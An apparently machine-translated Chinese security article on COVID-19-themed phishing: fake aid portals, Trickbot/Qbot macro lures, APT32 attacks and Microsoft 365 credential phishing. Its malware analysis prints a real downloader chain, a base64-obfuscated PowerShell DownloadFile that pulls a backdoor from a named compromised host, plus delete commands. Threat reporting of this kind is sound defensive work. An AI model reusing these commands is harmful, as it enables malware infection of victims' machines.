攻击者继续利用COVID-19主题,对对与该流行病有关的一切都非常感兴趣的用户造成越来越多的威胁。在上一篇文章中,我们已经讨论过冠状病毒之后出现了哪些类型的恶意软件,今天我们将讨论不同国家(包括俄罗斯)的用户已经遇到的社交工程技术。总体趋势和例子-在削减。
还记得上次我们谈论人们如何不仅容易阅读冠状病毒和流行病的过程,而且还了解经济支持措施的情况吗?这是一个很好的例子。在北威州的北莱茵-威斯特法伦州,发现了一种奇怪的网络钓鱼攻击。攻击者创建了经济部(NRW经济事务部)网站的副本),任何人都可以申请经济援助。这样的程序确实存在,事实证明它是骗子的手。他们收到了受害者的个人数据后,已经在该部的网站上提出了申请,但指出了其他银行详细信息。根据官方数据,在该计划被披露之前,已经提出了4000个此类虚假请求。结果,用于受影响公民的1.09亿美元落入了欺诈者之手。
您要免费测试COVID-19吗?
电子邮件中还发现了另一个冠状病毒网络钓鱼的典型例子。消息已受到用户的欢迎,他们提出了一项免费测试冠状病毒感染的建议。这些信件的附件中有Trickbot / Qakbot / Qbot的实例。当想要检查自己的健康状况的人开始“填写所附表格”时,恶意脚本便被下载到计算机上。为了避免使用沙盒方法进行验证,该脚本只有在安全系统确信没有恶意活动发生之后,才开始加载主要病毒。说服大多数用户启用宏也很容易。为此,使用了一个标准技巧,即在填写调查表时,首先需要启用宏,这意味着您需要运行VBA脚本。
如您所见,VBA脚本特别针对防病毒进行了屏蔽。
当应用程序在接受默认答案“是”之前等待/ T <seconds>时,Windows具有等待功能。在我们的例子中,脚本在删除临时文件之前等待了65秒:
在等待过程中,恶意软件被下载。为此,启动了一个特殊的PowerShell脚本:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
解码Base64值后,PowerShell脚本会加载位于德国之前被黑客入侵的Web服务器上的后门:http://automatischer-staubsauger.com/feature/777777.png
并将其保存为以下名称:C:\Users\Public\tmpdir\file1.exe
‘C:\Users\Public\tmpdir’运行文件“ tmps1.bat”时,该文件
夹将被删除,其中包含以下命令cmd /c mkdir ""C:\Users\Public\tmpdir"".针对政府机构的针对性攻击
此外,FireEye分析师最近报道了APT32针对武汉政府机构以及中国应急管理部的针对性攻击。其中一个分布式RTF包含指向《纽约时报》上题为“ 冠状病毒实时更新:中国正在追踪湖北旅行者 ”的文章的链接。但是,在阅读时,会下载恶意软件(FireEye分析人员将实例标识为METALJACK)。有趣的是,在检测时,根据Virustotal,没有任何防病毒软件检测到此实例。
当官方网站“说谎”时
网络钓鱼攻击最明显的例子是前几天在俄罗斯发生的情况。这样做的原因是为3至16岁的儿童指定了期待已久的津贴。 2020年5月12日宣布开始接受申请时,成千上万的人赶赴国家服务网站寻求期待已久的帮助,并关闭了该门户网站,这不比专业的DDoS攻击更糟。当总统说“国家服务无法应对申请流程”时,他们开始谈论一个事实,即接受申请的替代站点已经开始起作用。
问题在于,有几个站点可以同时赚钱,而一个站点(位于posobie16.gosuslugi.ru上的真正站点)确实可以接受申请,还有数十个站点收集了受信任用户的个人数据。HeartInform的同事在.ru区域中发现了大约30个新的欺诈域。自4月初以来,Softline公司的Infosecurity已跟踪了70多个类似的伪造公共服务网站。他们的创作者操纵熟悉的符号,并同时使用gosuslugi,gosuslugi-16,vyplaty,covid-vyplaty,posobie等单词的组合。航空与社会工程
所有这些例子仅证明攻击者成功地将冠状病毒主题货币化。而且,社会紧张程度越高,问题越不清楚,欺诈者窃取重要数据,迫使人们自己出钱或仅仅是破解更多计算机的机会就越大。鉴于这种流行病使潜在的准备不足的人们大量在家工作,不仅个人数据,而且公司数据都受到威胁。例如,最近Microsoft 365(以前称为Office 365)的用户也遭受了网络钓鱼攻击。人们在信件的附件中大量收到了语音“遗漏”的消息。但是,实际上,这些文件是一个HTML页面,该页面将攻击的受害者发送到了虚假的Microsoft 365登录页面。。结果-失去访问权限并破坏了帐户中的所有数据。